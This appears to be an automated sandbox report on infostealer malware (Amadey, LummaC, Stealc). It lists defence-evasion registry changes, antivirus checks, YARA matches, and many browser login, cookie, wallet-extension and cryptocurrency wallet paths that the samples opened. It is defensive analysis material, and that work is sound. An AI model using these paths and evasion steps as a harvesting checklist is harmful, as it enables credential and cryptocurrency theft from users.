Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682431214.0000000005B91000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681603974.0000000005B91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2306646203.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1741706182.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1688680503.0000000004860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1729011202.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1671498988.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1711619647.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6e1fbaaba5.exe PID: 7984, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
